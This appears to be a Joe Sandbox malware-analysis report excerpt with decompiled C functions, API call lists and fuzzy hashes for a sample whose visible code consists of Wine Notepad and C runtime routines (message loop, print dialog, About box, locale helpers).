                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateReadSize
                                                  • String ID:
                                                  • API String ID: 3664964396-0
                                                  • Opcode ID: f2989496f8a3acf7acccd9178e719f196b0781fa1ed28da57f028bd16a63c671
                                                  • Instruction ID: 23415bc35618172805f93c12e6c2346075209b962ded3917a35aff052a2fb7aa
                                                  • Opcode Fuzzy Hash: f2989496f8a3acf7acccd9178e719f196b0781fa1ed28da57f028bd16a63c671
                                                  • Instruction Fuzzy Hash: B801DF302402146BFA30A6BC9D8AFE9366C9F06720F1003A5FAD6E21C0DAB5594147A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E010A9569(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				LONG* _t20;
                                                  				signed int _t25;
                                                  				void* _t29;
                                                  				void* _t31;
                                                  				LONG* _t33;
                                                  				void* _t34;
                                                  
                                                  				_t29 = __edx;
                                                  				_t24 = __ebx;
                                                  				_push(0xc);
                                                  				_push(0x10bf278);
                                                  				E010A61F0(__ebx, __edi, __esi);
                                                  				_t31 = E010A7A00();
                                                  				_t25 =  *0x10c1e64; // 0xfffffffe
                                                  				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                  					E010A8834(0xd);
                                                  					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                  					_t33 =  *(_t31 + 0x68);
                                                  					 *(_t34 - 0x1c) = _t33;
                                                  					__eflags = _t33 -  *0x10c16fc; // 0xf13230
                                                  					if(__eflags != 0) {
                                                  						__eflags = _t33;
                                                  						if(__eflags != 0) {
                                                  							__eflags = InterlockedDecrement(_t33);
                                                  							if(__eflags == 0) {
                                                  								__eflags = _t33 - 0x10c19f8;
                                                  								if(__eflags != 0) {
                                                  									E010A8C4B(_t33);
                                                  								}
                                                  							}
                                                  						}
                                                  						_t20 =  *0x10c16fc; // 0xf13230
                                                  						 *(_t31 + 0x68) = _t20;
                                                  						_t33 =  *0x10c16fc; // 0xf13230
                                                  						 *(_t34 - 0x1c) = _t33;
                                                  						InterlockedIncrement(_t33);
                                                  					}
                                                  					 *(_t34 - 4) = 0xfffffffe;
                                                  					E010A9605();
                                                  				} else {
                                                  					_t33 =  *(_t31 + 0x68);
                                                  				}
                                                  				_t38 = _t33;
                                                  				if(_t33 == 0) {
                                                  					E010A44DD(_t24, _t29, _t31, _t33, _t38, 0x20);
                                                  				}
                                                  				return E010A6235(_t33);
                                                  			}









                                                  APIs
                                                    • Part of subcall function 010A7A00: __getptd_noexit.LIBCMT ref: 010A7A01
                                                    • Part of subcall function 010A7A00: __amsg_exit.LIBCMT ref: 010A7A0E
                                                  • __amsg_exit.LIBCMT ref: 010A9596
                                                  • __lock.LIBCMT ref: 010A95A6
                                                  • InterlockedDecrement.KERNEL32(?), ref: 010A95C3
                                                  • _free.LIBCMT ref: 010A95D6
                                                  • InterlockedIncrement.KERNEL32(00F13230), ref: 010A95EE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                                                  • String ID:
                                                  • API String ID: 1231874560-0
                                                  • Opcode ID: c11f683ff8823e5ff632bdef595faa801178fca77610af967a01849adf7ef81f
                                                  • Instruction ID: e865f658b2440249ad67686c148c2942c85d4372d33ca52f5e1e0c4e18141c01
                                                  • Opcode Fuzzy Hash: c11f683ff8823e5ff632bdef595faa801178fca77610af967a01849adf7ef81f
                                                  • Instruction Fuzzy Hash: 1A012631B00612DFEB21AFF8D0457DE7BA0AF05B58F884149D8C467641CB386942CFD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 90%
                                                  			E010B6059(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				intOrPtr* _t24;
                                                  				void* _t35;
                                                  				intOrPtr* _t37;
                                                  				void* _t38;
                                                  
                                                  				_push(0xc);
                                                  				_push(0x10bf540);
                                                  				E010A61F0(__ebx, __edi, __esi);
                                                  				_t35 = E010A7A00();
                                                  				_t37 = E010A8C83(8, 1);
                                                  				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
                                                  				if(_t37 != 0) {
                                                  					E010AEBF8(__ebx, __edx, _t35, _t37, __eflags);
                                                  					E010A9569(__ebx, __edx, _t35, _t37, __eflags);
                                                  					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
                                                  					 *(_t37 + 4) =  *(_t35 + 0x68);
                                                  					E010A8834(0xc);
                                                  					_t5 = _t38 - 4;
                                                  					 *_t5 =  *(_t38 - 4) & 0x00000000;
                                                  					__eflags =  *_t5;
                                                  					E010AE973( *_t37);
                                                  					 *(_t38 - 4) = 0xfffffffe;
                                                  					E010B6713();
                                                  					E010A8834(0xd);
                                                  					 *(_t38 - 4) = 1;
                                                  					InterlockedIncrement( *(_t37 + 4));
                                                  					 *(_t38 - 4) = 0xfffffffe;
                                                  					E010B671F();
                                                  					_t24 = _t37;
                                                  				} else {
                                                  					 *((intOrPtr*)(E010A6117())) = 0xc;
                                                  					_t24 = 0;
                                                  				}
                                                  				return E010A6235(_t24);
                                                  			}







                                                  APIs
                                                    • Part of subcall function 010A7A00: __getptd_noexit.LIBCMT ref: 010A7A01
                                                    • Part of subcall function 010A7A00: __amsg_exit.LIBCMT ref: 010A7A0E
                                                  • __calloc_crt.LIBCMT ref: 010B6690
                                                    • Part of subcall function 010A8C83: __calloc_impl.LIBCMT ref: 010A8C92
                                                    • Part of subcall function 010A8C83: Sleep.KERNEL32(00000000), ref: 010A8CA9
                                                  • __lock.LIBCMT ref: 010B66C6
                                                  • ___addlocaleref.LIBCMT ref: 010B66D2
                                                  • __lock.LIBCMT ref: 010B66E6
                                                  • InterlockedIncrement.KERNEL32(?), ref: 010B66F6
                                                    • Part of subcall function 010A6117: __getptd_noexit.LIBCMT ref: 010A6117
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                  • String ID:
                                                  • API String ID: 2144732038-0
                                                  • Opcode ID: cbfd91b5a04e5eab36ba29cf4cab12f98568be2de02e716754b36da64eb53699
                                                  • Instruction ID: f1a1ca0ad01216167b7d32764e817ee420cfd6bd6a40dbb747c820eb2a2bd595
                                                  • Opcode Fuzzy Hash: cbfd91b5a04e5eab36ba29cf4cab12f98568be2de02e716754b36da64eb53699
                                                  • Instruction Fuzzy Hash: 23018471541702EAE720BFF4D841BDC77E0BF24B60F64821AE5D5AB2C0DF7699408B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A1420() {
                                                  				intOrPtr _t6;
                                                  				int _t7;
                                                  				void* _t8;
                                                  				void* _t9;
                                                  
                                                  				_t7 = GetWindowTextLengthW( *0x10c3f2c);
                                                  				if(SendMessageW( *0x10c3f2c, 0xb8, 0, 0) == 0) {
                                                  					L9:
                                                  					SetWindowTextW( *0x10c3f2c, 0x10bedac);
                                                  					SendMessageW( *0x10c3f2c, 0xcd, 0, 0);
                                                  					return SetFocus( *0x10c3f2c);
                                                  				}
                                                  				_t6 =  *0x10c43b0;
                                                  				if(_t7 == 0 && _t6 == 0) {
                                                  					goto L9;
                                                  				}
                                                  				_t8 = _t7 - 2;
                                                  				if(_t8 == 0) {
                                                  					L10:
                                                  					return _t6;
                                                  				} else {
                                                  					_t9 = _t8 - 4;
                                                  					if(_t9 == 0) {
                                                  						if(_t6 != 0) {
                                                  							goto L9;
                                                  						}
                                                  						_t6 = E010A1770();
                                                  						if(_t6 != 0) {
                                                  							goto L9;
                                                  						}
                                                  						goto L10;
                                                  					} else {
                                                  						if(_t9 == 1) {
                                                  							goto L9;
                                                  						}
                                                  						return _t6;
                                                  					}
                                                  				}
                                                  			}








                                                  APIs
                                                  • GetWindowTextLengthW.USER32(76F12D10), ref: 010A1427
                                                  • SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A143E
                                                  • SetWindowTextW.USER32(010BEDAC), ref: 010A147F
                                                  • SendMessageW.USER32(000000CD,00000000,00000000), ref: 010A1494
                                                  • SetFocus.USER32(?,?,?,?,?,?,?), ref: 010A14A0
                                                    • Part of subcall function 010A1770: _memset.LIBCMT ref: 010A1781
                                                    • Part of subcall function 010A1770: lstrcpyW.KERNEL32 ref: 010A1795
                                                    • Part of subcall function 010A1770: GetSaveFileNameW.COMDLG32(?), ref: 010A17FD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSendTextWindow$FileFocusLengthNameSave_memsetlstrcpy
                                                  • String ID:
                                                  • API String ID: 4018755269-0
                                                  • Opcode ID: ac784a792a3f1d9ed2c5502fb43ba3a710919bf6a91be5aa9e49e5d2a2e3390e
                                                  • Instruction ID: d0d01fd0f563563de540cd7f9346493ed34abdffebda81ad61e8cb312e8b1206
                                                  • Opcode Fuzzy Hash: ac784a792a3f1d9ed2c5502fb43ba3a710919bf6a91be5aa9e49e5d2a2e3390e
                                                  • Instruction Fuzzy Hash: 58F01D365402129BFEB22BFCBD49BE53E71BB05690F958151FAC4A90A9CF7B8901CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A2AA8(void* __ebp, struct HACCEL__* _a16, struct tagMSG _a20, intOrPtr _a28) {
                                                  
                                                  				do {
                                                  					if(IsDialogMessageW( *0x10c3f28,  &_a20) == 0 && TranslateAcceleratorW( *0x10c3f24, _a16,  &_a20) == 0) {
                                                  						TranslateMessage( &_a20);
                                                  						DispatchMessageW( &_a20);
                                                  					}
                                                  				} while (GetMessageW( &_a20, 0, 0, 0) != 0);
                                                  				return _a28;
                                                  			}




                                                  APIs
                                                  • IsDialogMessageW.USER32 ref: 010A2ABB
                                                  • TranslateAcceleratorW.USER32(?,?), ref: 010A2AD4
                                                  • TranslateMessage.USER32(?), ref: 010A2AE3
                                                  • DispatchMessageW.USER32 ref: 010A2AEA
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 010A2AF7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Message$Translate$AcceleratorDialogDispatch
                                                  • String ID:
                                                  • API String ID: 3609149896-0
                                                  • Opcode ID: 133e86bec54473f1f56f6e4fd3e362fa2c5c49a2ea4619a0f178a58fcfc51ecf
                                                  • Instruction ID: 60769d02cf6f83864cc79469fbbcbb48fa8f249cc1afdab2abde353d41d93b44
                                                  • Opcode Fuzzy Hash: 133e86bec54473f1f56f6e4fd3e362fa2c5c49a2ea4619a0f178a58fcfc51ecf
                                                  • Instruction Fuzzy Hash: B7F0307220430AAFD720DF94ED84F9BB7ECFB88600F400829F6C4D2050E776D8199B62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A1890(signed short* __ecx, intOrPtr __edx) {
                                                  				signed short* _v8;
                                                  				intOrPtr _v12;
                                                  				signed int _t25;
                                                  				signed short* _t31;
                                                  				short _t32;
                                                  				int _t34;
                                                  				signed short* _t35;
                                                  				signed int _t36;
                                                  				void* _t38;
                                                  				signed int _t39;
                                                  				signed int _t41;
                                                  				signed short* _t42;
                                                  				void* _t43;
                                                  				void* _t44;
                                                  				signed int _t45;
                                                  				signed short* _t46;
                                                  				void* _t47;
                                                  
                                                  				_t35 = __ecx;
                                                  				_v12 = __edx;
                                                  				_t25 = 0;
                                                  				_t43 = 0;
                                                  				_t41 = 0;
                                                  				_v8 = __ecx;
                                                  				if( *__ecx == 0) {
                                                  					L12:
                                                  					_t44 = HeapAlloc(GetProcessHeap(), 0, 2 + _t25 * 2);
                                                  					if(_t44 == 0) {
                                                  						L26:
                                                  						return _t44;
                                                  					}
                                                  					_t42 = _v8;
                                                  					_t38 = 0;
                                                  					_t45 = 0;
                                                  					_t36 = 0;
                                                  					if( *_t42 == 0) {
                                                  						L25:
                                                  						 *(_t44 + _t45 * 2) = 0;
                                                  						goto L26;
                                                  					}
                                                  					_t31 = _t42;
                                                  					do {
                                                  						_t32 =  *_t31 & 0x0000ffff;
                                                  						if(_t38 == 0) {
                                                  							if(_t32 != 0x26) {
                                                  								 *(_t44 + _t45 * 2) = _t32;
                                                  								_t45 = _t45 + 1;
                                                  							} else {
                                                  								_t38 = _t32 - 0x25;
                                                  							}
                                                  						} else {
                                                  							if(_t32 != 0x26) {
                                                  								if(_t32 == 0x70) {
                                                  									_t34 = wnsprintfW(_t44 + _t45 * 2, 0xb, L"%d", _v12);
                                                  									_t42 = _v8;
                                                  									_t47 = _t47 + 0x10;
                                                  									_t45 = _t45 + _t34;
                                                  								}
                                                  								_t38 = 0;
                                                  							} else {
                                                  								 *(_t44 + _t45 * 2) = _t32;
                                                  								_t45 = _t45 + 1;
                                                  								_t38 = 0;
                                                  							}
                                                  						}
                                                  						_t36 = _t36 + 1;
                                                  						_t31 =  &(_t42[_t36]);
                                                  					} while (_t42[_t36] != 0);
                                                  					goto L25;
                                                  				} else {
                                                  					_t46 = __ecx;
                                                  					do {
                                                  						if(_t43 == 0) {
                                                  							if( *_t46 != 0x26) {
                                                  								_t25 = _t25 + 1;
                                                  							} else {
                                                  								_t43 = 1;
                                                  							}
                                                  						} else {
                                                  							_t39 =  *_t46 & 0x0000ffff;
                                                  							if(_t39 != 0x26) {
                                                  								if(_t39 == 0x70) {
                                                  									_t25 = _t25 + 0xb;
                                                  								}
                                                  								_t43 = 0;
                                                  							} else {
                                                  								_t25 = _t25 + 1;
                                                  								_t43 = 0;
                                                  							}
                                                  						}
                                                  						_t41 = _t41 + 1;
                                                  						_t46 = _t35 + _t41 * 2;
                                                  					} while ( *(_t35 + _t41 * 2) != 0);
                                                  					goto L12;
                                                  				}
                                                  			}





















                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A18F0
                                                  • HeapAlloc.KERNEL32(00000000), ref: 010A18F7
                                                  • wnsprintfW.SHLWAPI ref: 010A193B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcesswnsprintf
                                                  • String ID: 0U%w
                                                  • API String ID: 3886780628-2643132318
                                                  • Opcode ID: 9916096c3805b4b9809225e567bc4ec116c3a758825a474b788992e65f558275
                                                  • Instruction ID: 6a90e6872953abbebb6a89e2ed5d5b7f0aecbfb60ae0a0b9def7b31458370648
                                                  • Opcode Fuzzy Hash: 9916096c3805b4b9809225e567bc4ec116c3a758825a474b788992e65f558275
                                                  • Instruction Fuzzy Hash: DE21043A900215ABEF658FE9C48067D73FAFB85310FA440AAD8C6D7141EB708991C3E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A2000() {
                                                  				intOrPtr _v38;
                                                  				short _v40;
                                                  				intOrPtr _v52;
                                                  				intOrPtr _v60;
                                                  				intOrPtr _v64;
                                                  				intOrPtr _v68;
                                                  				struct tagPD _v72;
                                                  				intOrPtr _t22;
                                                  
                                                  				E010A66E0( &_v72, 0, 0x42);
                                                  				_v68 =  *0x10c3f24;
                                                  				_v64 =  *0x10c510c;
                                                  				_v60 =  *0x10c5110;
                                                  				_v38 =  *0x10c3f20;
                                                  				_v40 = 1;
                                                  				_v72 = 0x42;
                                                  				_v52 = 0x40;
                                                  				PrintDlgW( &_v72);
                                                  				 *0x10c510c = _v64;
                                                  				_t22 = _v60;
                                                  				 *0x10c5110 = _t22;
                                                  				return _t22;
                                                  			}












                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Print_memset
                                                  • String ID: @$B
                                                  • API String ID: 2425697088-3873543624
                                                  • Opcode ID: 0ed7951ad7dda9d1732d58cfcbcc2dfb1c7fc1c91c595e3ae27022c4a0439e86
                                                  • Instruction ID: ff1438fdd0d050c47bbb1b1408779daa2084e229ac3f0463d6330bf6720396ef
                                                  • Opcode Fuzzy Hash: 0ed7951ad7dda9d1732d58cfcbcc2dfb1c7fc1c91c595e3ae27022c4a0439e86
                                                  • Instruction Fuzzy Hash: BF01C9B8E102089FCB50CF98E985B8DB7F4FB4C300F404126E988E7344E77AA9058F55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A2580() {
                                                  				short _v516;
                                                  				void* _t3;
                                                  
                                                  				_t3 = LoadImageW( *0x10c3f20, 0x300, 1, 0x30, 0x30, 0x8000);
                                                  				LoadStringW( *0x10c3f20, 0x170,  &_v516, 0);
                                                  				return ShellAboutW( *0x10c3f24,  &_v516, L"Wine Notepad", _t3);
                                                  			}






                                                  APIs
                                                  • LoadImageW.USER32 ref: 010A25A0
                                                  • LoadStringW.USER32(00000170,?,00000000), ref: 010A25BC
                                                  • ShellAboutW.SHELL32(?,Wine Notepad,00000000), ref: 010A25D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Load$AboutImageShellString
                                                  • String ID: Wine Notepad
                                                  • API String ID: 2733739231-3086428749
                                                  • Opcode ID: e4b8ca5949e573987b6359b549a4c3ca6e1ffbc23e853ffee0d2c3fb6074d46d
                                                  • Instruction ID: b212f807f021e25f2be132c610dfb7e1d325a0875a9e818b18c112560ed9d484
                                                  • Opcode Fuzzy Hash: e4b8ca5949e573987b6359b549a4c3ca6e1ffbc23e853ffee0d2c3fb6074d46d
                                                  • Instruction Fuzzy Hash: 97F03033151215BBF7315790ED8AFEA7A7CF708B10F000051B698690D4D6A729148B94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 33%
                                                  			E010A8069(void* __ecx) {
                                                  				signed int _v8;
                                                  				_Unknown_base(*)()* _t5;
                                                  
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_t5 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetCurrentPackageId");
                                                  				if(_t5 == 0) {
                                                  					L3:
                                                  					return 0;
                                                  				} else {
                                                  					_push(0);
                                                  					_push( &_v8);
                                                  					if( *_t5() != 0x7a) {
                                                  						goto L3;
                                                  					} else {
                                                  						return 1;
                                                  					}
                                                  				}
                                                  			}






                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentPackageId), ref: 010A807B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 010A8082
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: GetCurrentPackageId$kernel32.dll
                                                  • API String ID: 1646373207-142416881
                                                  • Opcode ID: 74ef7e9d0bf7c52f03b9e37a69149a223e82a51dc4626ef6255aca5a11d048cc
                                                  • Instruction ID: cc3f773d983011958fed7e35ce9bd8c2ddb3a76e4604934d31fbaee96844d6fa
                                                  • Opcode Fuzzy Hash: 74ef7e9d0bf7c52f03b9e37a69149a223e82a51dc4626ef6255aca5a11d048cc
                                                  • Instruction Fuzzy Hash: 4FE0EC316A030477EB64ABF19E8AB9B769C970164AF504968F282E1081DAF9D6008764
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010AFAAD(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                  				char _v8;
                                                  				intOrPtr _v12;
                                                  				signed int _v20;
                                                  				signed int _t35;
                                                  				int _t38;
                                                  				int _t42;
                                                  				intOrPtr* _t44;
                                                  				int _t47;
                                                  				short* _t49;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t54;
                                                  				int _t55;
                                                  				signed int _t59;
                                                  				char* _t62;
                                                  
                                                  				_t62 = _a8;
                                                  				if(_t62 == 0) {
                                                  					L5:
                                                  					return 0;
                                                  				}
                                                  				_t50 = _a12;
                                                  				if(_t50 == 0) {
                                                  					goto L5;
                                                  				}
                                                  				if( *_t62 != 0) {
                                                  					E010A9233( &_v20, _a16);
                                                  					_t35 = _v20;
                                                  					__eflags =  *(_t35 + 0xa8);
                                                  					if( *(_t35 + 0xa8) != 0) {
                                                  						_t38 = E010AF98A( *_t62 & 0x000000ff,  &_v20);
                                                  						__eflags = _t38;
                                                  						if(_t38 == 0) {
                                                  							__eflags = _a4;
                                                  							_t59 = 1;
                                                  							_t28 = _v20 + 4; // 0x840ffff8
                                                  							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                  							__eflags = _t42;
                                                  							if(_t42 != 0) {
                                                  								L21:
                                                  								__eflags = _v8;
                                                  								if(_v8 != 0) {
                                                  									_t54 = _v12;
                                                  									_t31 = _t54 + 0x70;
                                                  									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                  									__eflags =  *_t31;
                                                  								}
                                                  								return _t59;
                                                  							}
                                                  							L20:
                                                  							_t44 = E010A6117();
                                                  							_t59 = _t59 | 0xffffffff;
                                                  							__eflags = _t59;
                                                  							 *_t44 = 0x2a;
                                                  							goto L21;
                                                  						}
                                                  						_t59 = _v20;
                                                  						__eflags =  *(_t59 + 0x74) - 1;
                                                  						if( *(_t59 + 0x74) <= 1) {
                                                  							L15:
                                                  							_t20 = _t59 + 0x74; // 0x48b1fe1
                                                  							__eflags = _t50 -  *_t20;
                                                  							L16:
                                                  							if(__eflags < 0) {
                                                  								goto L20;
                                                  							}
                                                  							__eflags = _t62[1];
                                                  							if(_t62[1] == 0) {
                                                  								goto L20;
                                                  							}
                                                  							L18:
                                                  							_t22 = _t59 + 0x74; // 0x48b1fe1
                                                  							_t59 =  *_t22;
                                                  							goto L21;
                                                  						}
                                                  						_t12 = _t59 + 0x74; // 0x48b1fe1
                                                  						__eflags = _t50 -  *_t12;
                                                  						if(__eflags < 0) {
                                                  							goto L16;
                                                  						}
                                                  						__eflags = _a4;
                                                  						_t17 = _t59 + 0x74; // 0x48b1fe1
                                                  						_t18 = _t59 + 4; // 0x840ffff8
                                                  						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                                  						_t59 = _v20;
                                                  						__eflags = _t47;
                                                  						if(_t47 != 0) {
                                                  							goto L18;
                                                  						}
                                                  						goto L15;
                                                  					}
                                                  					_t55 = _a4;
                                                  					__eflags = _t55;
                                                  					if(_t55 != 0) {
                                                  						 *_t55 =  *_t62 & 0x000000ff;
                                                  					}
                                                  					_t59 = 1;
                                                  					goto L21;
                                                  				}
                                                  				_t49 = _a4;
                                                  				if(_t49 != 0) {
                                                  					 *_t49 = 0;
                                                  				}
                                                  				goto L5;
                                                  			}


















                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 010AFAE1
                                                  • __isleadbyte_l.LIBCMT ref: 010AFB0F
                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,048B1FE1,00BFBBEF,00000000,?,00000000,?,?,010B3743,?,00BFBBEF,00000003), ref: 010AFB3D
                                                  • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,?,?,010B3743,?,00BFBBEF,00000003), ref: 010AFB73
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: 7ac7f67495ec194942098bc58d9c9eede84a3723049a816becf9cb66fe3169b6
